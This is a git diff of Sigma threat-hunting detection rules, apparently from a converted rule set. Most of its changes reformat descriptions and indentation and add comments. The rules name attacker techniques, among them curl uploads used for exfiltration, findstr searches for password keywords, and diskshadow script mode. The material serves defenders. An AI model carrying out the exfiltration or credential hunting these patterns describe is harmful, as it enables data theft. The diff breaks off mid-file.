a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_library_access.yml b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_library_access.yml index 4700ff5a1..39feeab87 100644 --- a/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_library_access.yml +++ b/sigma/builtin/threat-hunting/powershell/powershell_script/posh_ps_win_api_library_access.yml @@ -1,16 +1,14 @@ title: WinAPI Function Calls Via PowerShell Scripts id: 9f22ccd5-a435-453b-af96-bf99cbb594d4 related: - - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 - type: similar - - id: 03d83090-8cba-44a0-b02f-0b756a050306 - type: similar - - id: 19d65a1c-8540-4140-8062-8eb00db0bba5 - type: similar + - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 + type: similar + - id: 03d83090-8cba-44a0-b02f-0b756a050306 + type: similar + - id: 19d65a1c-8540-4140-8062-8eb00db0bba5 + type: similar status: experimental -description: Detects calls to WinAPI functions from PowerShell scripts. Attackers - can often leverage these APIs to avoid detection based on typical PowerShell function - calls. Use this rule as a basis to hunt for interesting scripts. +description: Detects calls to WinAPI functions from PowerShell scripts. Attackers can often leverage these APIs to avoid detection based on typical PowerShell function calls. Use this rule as a basis to hunt for interesting scripts. references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -72,8 +70,6 @@ detection: - ZeroFreeGlobalAllocUnicode condition: ps_script and selection falsepositives: - - This rule is mainly used for hunting and will generate quite a lot of false - positives when applied in production. It's best combined with other fields - such as the path of execution, the parent process, etc. + - This rule is mainly used for hunting and will generate quite a lot of false positives when applied in production. It's best combined with other fields such as the path of execution, the parent process, etc. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml index a84f1c608..ff0078713 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_csc_compilation.yml @@ -1,11 +1,10 @@ title: Dynamic .NET Compilation Via Csc.EXE - Hunting id: acf2807c-805b-4042-aab9-f86b6ba9cb2b related: - - id: dcaa3f04-70c3-427a-80b4-b870d73c94c4 - type: derived + - id: dcaa3f04-70c3-427a-80b4-b870d73c94c4 + type: derived status: experimental -description: Detects execution of "csc.exe" to compile .NET code. Attackers often - leverage this to compile code on the fly and use it in other stages. +description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. references: - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/ - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf @@ -25,11 +24,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: /noconfig /fullpaths @ - NewProcessName|endswith: \csc.exe + CommandLine|contains: /noconfig /fullpaths @ + NewProcessName|endswith: \csc.exe condition: process_creation and selection falsepositives: - - Many legitimate applications make use of dynamic compilation. Use this rule - to hunt for anomalies + - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_download.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_download.yml index 472ed74ce..821259033 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_download.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_download.yml @@ -1,10 +1,10 @@ title: File Download Via Curl.EXE id: 9a517fca-4ba3-4629-9278-a68694697b81 related: - - id: bbeaed61-1990-4773-bf57-b81dbad7db2d - type: derived - - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 - type: derived + - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution + type: derived + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution + type: derived status: test description: Detects file download using curl.exe references: @@ -24,18 +24,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - Product: The curl executable + - NewProcessName|endswith: \curl.exe + - Product: The curl executable selection_remote: - CommandLine|contains: - - ' -O' + CommandLine|contains: + - ' -O' # covers the alias for --remote-name and --output - --remote-name - --output condition: process_creation and (all of selection_*) falsepositives: - Scripts created by developers and admins - Administrative activity - - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific - file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt " + - The "\Git\usr\bin\sh.exe" process uses the "--output" flag to download a specific file in the temp directory with the pattern "gfw-httpget-xxxxxxxx.txt " level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_execution.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_execution.yml index 3d8bfccd2..db3ea5d98 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_execution.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_execution.yml @@ -1,11 +1,10 @@ title: Curl.EXE Execution id: bbeaed61-1990-4773-bf57-b81dbad7db2d related: - - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 - type: derived + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 # Suspicious curl execution + type: derived status: test -description: Detects a curl process start on Windows, which could indicates a file - download from a remote location or a simple web request to a remote server +description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server references: - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464 author: Florian Roth (Nextron Systems) @@ -23,8 +22,8 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: \curl.exe - - Product: The curl executable + - NewProcessName|endswith: \curl.exe + - Product: The curl executable condition: process_creation and selection falsepositives: - Scripts created by developers and admins diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml index 119bb2497..3e3a9071b 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_fileupload.yml @@ -1,8 +1,7 @@ title: Potential Data Exfiltration Via Curl.EXE id: 00bca14a-df4e-4649-9054-3f2aa676bc04 status: test -description: Detects the execution of the "curl" process with "upload" flags. Which - might indicate potential data exfiltration +description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration references: - https://twitter.com/d1r4c/status/1279042657508081664 - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76 @@ -24,17 +23,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \curl.exe - - Product: The curl executable + - NewProcessName|endswith: \curl.exe + - Product: The curl executable selection_cli: - - CommandLine|contains: - - ' --form' - - ' --upload-file ' - - ' --data ' - - ' --data-' - - CommandLine|re: \s-[FTd]\s + - CommandLine|contains: + - ' --form' # Also covers the "--form-string" + - ' --upload-file ' + - ' --data ' + - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode" + - CommandLine|re: \s-[FTd]\s # We use regex to ensure a case sensitive argument detection filter_optional_localhost: - CommandLine|contains: + CommandLine|contains: - ://localhost - ://127.0.0.1 condition: process_creation and (all of selection_* and not 1 of filter_optional_*) diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml index f357f5150..0ed9b8f50 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_curl_useragent.yml @@ -20,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_curl: - - NewProcessName|endswith: \curl.exe - - Product: The curl executable + - NewProcessName|endswith: \curl.exe + - Product: The curl executable selection_opt: - CommandLine|contains: + CommandLine|contains: - ' -A ' - ' --user-agent ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml index 589debe34..45f928bdb 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_dfsvc_child_processes.yml @@ -1,8 +1,7 @@ title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process id: 241d52b5-eee0-49d0-ac8a-8b9c15c7221c status: experimental -description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment - execution. +description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. references: - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 author: Nasreddine Bencherchali (Nextron Systems) @@ -20,10 +19,9 @@ detection: Channel: Security selection: ParentProcessName|endswith: \dfsvc.exe - NewProcessName|endswith: \AppData\Local\Apps\2.0\ + NewProcessName|endswith: \AppData\Local\Apps\2.0\ condition: process_creation and selection falsepositives: - - False positives are expected in environement leveraging ClickOnce deployments. - An initial baselining is required before using this rule in production. + - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml index c70b8c6b2..194d1dd9e 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_child_process.yml @@ -1,18 +1,16 @@ title: Diskshadow Child Process Spawned id: 56b1dde8-b274-435f-a73a-fb75eb81262a related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution + type: similar status: experimental -description: Detects any child process spawning from "Diskshadow.exe". This could - be due to executing Diskshadow in interpreter mode or script mode and using the - "exec" flag to launch other applications. +description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -34,7 +32,7 @@ detection: selection: ParentProcessName|endswith: \diskshadow.exe filter_main_werfault: - NewProcessName|endswith: :\Windows\System32\WerFault.exe + NewProcessName|endswith: :\Windows\System32\WerFault.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Likely from legitimate usage of Diskshadow in Interpreter mode. diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml index 4c58b57ec..5961f4301 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_diskshadow_script_mode.yml @@ -1,20 +1,17 @@ title: Diskshadow Script Mode Execution id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 related: - - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 - type: similar - - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f - type: similar - - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 - type: similar - - id: 56b1dde8-b274-435f-a73a-fb75eb81262a - type: similar + - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location + type: similar + - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution + type: similar + - id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8 # Potentially Suspicious Child Process Of DiskShadow.EXE + type: similar + - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned + type: similar status: test -description: 'Detects execution of "Diskshadow.exe" in script mode using the "/s" - flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow - copies on the systems. Investigate the content of the scripts and its location. - - ' +description: | + Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location. references: - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration @@ -35,10 +32,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: diskshadow.exe - - NewProcessName|endswith: \diskshadow.exe + - OriginalFileName: diskshadow.exe + - NewProcessName|endswith: \diskshadow.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '/s ' - '-s ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml index d480fd9a4..88254635d 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_findstr_password_recon.yml @@ -1,8 +1,7 @@ title: Potential Password Reconnaissance Via Findstr.EXE id: 1a0f6f16-2099-4753-9a02-43b6ac7a1fa5 status: experimental -description: Detects command line usage of "findstr" to search for the "passwords" - keyword in a variety of different languages +description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages references: - https://steflan-security.com/windows-privilege-escalation-credential-harvesting/ - https://adsecurity.org/?p=2288 @@ -20,19 +19,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \findstr.exe - - OriginalFileName: FINDSTR.EXE + - NewProcessName|endswith: \findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli: - CommandLine|contains: - - "contrase\xF1a" - - "has\u0142o" - - heslo - - parola - - passe - - passw - - senha - - senord - - "\u5BC6\u78BC" + CommandLine|contains: + - contraseña # Spanish + - hasło # Polish + - heslo # Czech + - parola # Italian + - passe # French + - passw # German, English + - senha # Portuguese + - senord # Swedish + - 密碼 # Cantonese condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_net_quic.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_net_quic.yml index 1e7dcb1c3..e1b1d9e34 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_net_quic.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_net_quic.yml @@ -1,11 +1,10 @@ title: SMB over QUIC Via Net.EXE id: 2238d337-42fb-4971-9a68-63570f2aede4 related: - - id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae - type: similar + - id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae + type: similar status: experimental -description: Detects the mounting of Windows SMB shares over QUIC, which can be an - unexpected event in some enterprise environments. +description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments. references: - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md - https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/ @@ -23,14 +22,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \net.exe - - \net1.exe - - OriginalFileName: - - net.exe - - net1.exe + - NewProcessName|endswith: + - \net.exe + - \net1.exe + - OriginalFileName: + - net.exe + - net1.exe selection_cli: - CommandLine|contains: /TRANSPORT:QUIC + CommandLine|contains: /TRANSPORT:QUIC condition: process_creation and (all of selection_*) falsepositives: - Administrative activity diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml index 17ef949b3..253924ee6 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_office_svchost_parent.yml @@ -1,14 +1,9 @@ title: Suspicious New Instance Of An Office COM Object id: 9bdaf1e9-fdef-443b-8081-4341b74a7e28 status: test -description: 'Detects an svchost process spawning an instance of an office application. - This happens when the initial word application creates an instance of one of the - Office COM objects such as ''Word.Application'', ''Excel.Application'', etc. - - This can be used by malicious actors to create malicious Office documents with - macros on the fly. (See vba2clr project in the references) - - ' +description: | + Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc. + This can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references) references: - https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic - https://github.com/med0x2e/vba2clr @@ -28,7 +23,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \svchost.exe - NewProcessName|endswith: + NewProcessName|endswith: - \eqnedt32.exe - \excel.exe - \msaccess.exe diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml index eb8ac5d4d..a082a9beb 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_abnormal_commandline_size.yml @@ -1,8 +1,7 @@ title: Unusually Long PowerShell CommandLine id: d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6 status: test -description: Detects unusually long PowerShell command lines with a length of 1000 - characters or more +description: Detects unusually long PowerShell command lines with a length of 1000 characters or more references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse author: oscd.community, Natalia Shornikova @@ -20,16 +19,16 @@ detection: EventID: 4688 Channel: Security selection_powershell: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Description: Windows Powershell - - Product: PowerShell Core 6 + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Description: Windows Powershell + - Product: PowerShell Core 6 selection_length: - CommandLine|re: .{1000,} + CommandLine|re: .{1000,} condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml index 016dad1d3..aa785a45a 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_crypto_namespace.yml @@ -1,15 +1,10 @@ title: Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace id: ad856965-f44d-42a8-945e-bbf7bd03d05a status: experimental -description: 'Detects the invocation of PowerShell commands with references to classes - from the "System.Security.Cryptography" namespace. - - The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly - encryption and decryption. - +description: | + Detects the invocation of PowerShell commands with references to classes from the "System.Security.Cryptography" namespace. + The PowerShell namespace "System.Security.Cryptography" provides classes for on-the-fly encryption and decryption. These can be used for example in decrypting malicious payload for defense evasion. - - ' references: - https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography?view=net-8.0 - https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html @@ -29,16 +24,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet_namespace: - CommandLine|contains: System.Security.Cryptography. + CommandLine|contains: System.Security.Cryptography. selection_cmdlet_classes: - CommandLine|contains: + CommandLine|contains: - .AesCryptoServiceProvider - .DESCryptoServiceProvider - .DSACryptoServiceProvider @@ -48,7 +43,6 @@ detection: - .TripleDESCryptoServiceProvider condition: process_creation and (all of selection_*) falsepositives: - - Classes are legitimately used, but less so when e.g. parents with low prevalence - or decryption of content in temporary folders. + - Classes are legitimately used, but less so when e.g. parents with low prevalence or decryption of content in temporary folders. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml index 3b94d8ef4..41e2f85ff 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_powershell_import_module.yml @@ -1,8 +1,7 @@ title: Import New Module Via PowerShell CommandLine id: 4ad74d01-f48c-42d0-b88c-b31efa4d2262 status: experimental -description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets - to the current PowerShell session +description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.3 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-5.1 @@ -20,18 +19,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Import-Module ' - 'ipmo ' filter_main_vsstudio: - CommandLine|contains|all: + CommandLine|contains|all: - :\Program Files\Microsoft Visual Studio\ - Tools\Microsoft.VisualStudio.DevShell.dll ParentProcessName|contains: @@ -39,7 +38,6 @@ detection: - :\Windows\System32\cmd.exe condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Depending on the environement, many legitimate scripts will import modules inline. - This rule is targeted for hunting purposes. + - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes. level: low ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml index 85a9b1aa6..248f2d2a7 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_regsvr32_dllregisterserver_exec.yml @@ -1,16 +1,12 @@ title: Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly id: ce2c44b5-a6ac-412a-afba-9e89326fa972 related: - - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e - type: similar + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + type: similar status: experimental -description: 'Detects execution of regsvr32 with the silent flag and no other flags - on a DLL located in an uncommon or potentially suspicious location. - - When Regsvr32 is called in such a way, it implicitly calls the DLL export function - ''DllRegisterServer''. - - ' +description: | + Detects execution of regsvr32 with the silent flag and no other flags on a DLL located in an uncommon or potentially suspicious location. + When Regsvr32 is called in such a way, it implicitly calls the DLL export function 'DllRegisterServer'. references: - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - https://www.virustotal.com/gui/file/288fc4f954f98d724e6fab32a89477943df5c0e9662cb199a19b90ae0c63aebe/detection @@ -30,33 +26,33 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|endswith: \regsvr32.exe - - OriginalFileName: REGSVR32.EXE + - NewProcessName|endswith: \regsvr32.exe + - OriginalFileName: REGSVR32.EXE selection_cmdline: - CommandLine|contains: + CommandLine|contains: - ' /s ' - ' /e ' filter_main_paths: - - CommandLine|contains: - - :\Program Files (x86) - - :\Program Files\ - - :\Windows\System32\ - - :\Windows\SysWOW64\ - - CurrentDirectory|contains: - - :\Program Files (x86) - - :\Program Files\ - - :\Windows\System32\ - - :\Windows\SysWOW64\ + - CommandLine|contains: + - :\Program Files (x86) + - :\Program Files\ + - :\Windows\System32\ + - :\Windows\SysWOW64\ + - CurrentDirectory|contains: + - :\Program Files (x86) + - :\Program Files\ + - :\Windows\System32\ + - :\Windows\SysWOW64\ filter_main_other_flags: - CommandLine|contains: + # Note: We filter other flags to keep the logic of the rule + CommandLine|contains: - ' /i:' - '/U ' filter_main_rpcproxy: ParentCommandLine|endswith: :\Windows\System32\RpcProxy\RpcProxy.dll - CommandLine: regsvr32 /s rpcproxy.dll + CommandLine: regsvr32 /s rpcproxy.dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Legitimate usage as part of application installation, but less likely from e.g. - temporary paths. + - Legitimate usage as part of application installation, but less likely from e.g. temporary paths. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml index 82144b165..c76ae5663 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_rundll32_dllregisterserver.yml @@ -1,14 +1,11 @@ title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly id: d81a9fc6-55db-4461-b962-0e78fea5b0ad related: - - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed - type: similar + - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed rundll32 + type: similar status: experimental -description: 'Detects when the DLL export function ''DllRegisterServer'' is called - in the commandline by Rundll32 explicitly where the DLL is located in a non-standard - path. - - ' +description: | + Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path. references: - https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ - https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior @@ -27,21 +24,19 @@ detection: EventID: 4688 Channel: Security selection_image: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cmdline: - CommandLine|contains: DllRegisterServer + CommandLine|contains: DllRegisterServer filter_main_legit_paths: - CommandLine|contains: + CommandLine|contains: - :\Program Files (x86) - :\Program Files\ - :\Windows\System32\ - :\Windows\SysWOW64\ condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Legitimate usage as part of application installation, but less likely from e.g. - temporary paths. - - Not every instance is considered malicious, but this rule will capture the malicious - usages. + - Legitimate usage as part of application installation, but less likely from e.g. temporary paths. + - Not every instance is considered malicious, but this rule will capture the malicious usages. level: medium ruletype: Sigma diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml index c531c4226..21cd7aab9 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_compression_params.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Compression Tool Parameters id: 27a72a60-7e5e-47b1-9d17-909c9abafdcd status: test -description: Detects potentially suspicious command line arguments of common data - compression tools +description: Detects potentially suspicious command line arguments of common data compression tools references: - https://twitter.com/SBousseaden/status/1184067445612535811 author: Florian Roth (Nextron Systems), Samir Bousseaden @@ -24,7 +23,7 @@ detection: - 7z*.exe - '*rar.exe' - '*Command*Line*RAR*' - CommandLine|contains: + CommandLine|contains: - ' -p' - ' -ta' - ' -tb' diff --git a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml index 2af18b82d..33d7ad436 100644 --- a/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml +++ b/sigma/builtin/threat-hunting/process_creation/proc_creation_win_susp_elevated_system_shell.yml @@ -1,14 +1,11 @@ title: Elevated System Shell Spawned id: 61065c72-5d7d-44ef-bf41-6a36684b545f related: - - id: 178e615d-e666-498b-9630-9ed363038101 - type: similar + - id: 178e615d-e666-498b-9630-9ed363038101 + type: similar status: experimental -description: 'Detects when a shell program such as the Windows command prompt or PowerShell - is launched with system privileges. Use this rule to hunt for potential suspicious - processes. - - ' +description: | + Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes. references: - https://github.com/Wh04m1001/SysmonEoP author: Nasreddine Bencherchali (Nextron Systems), frack113 @@ -27,16 +24,16 @@ detection: EventID: 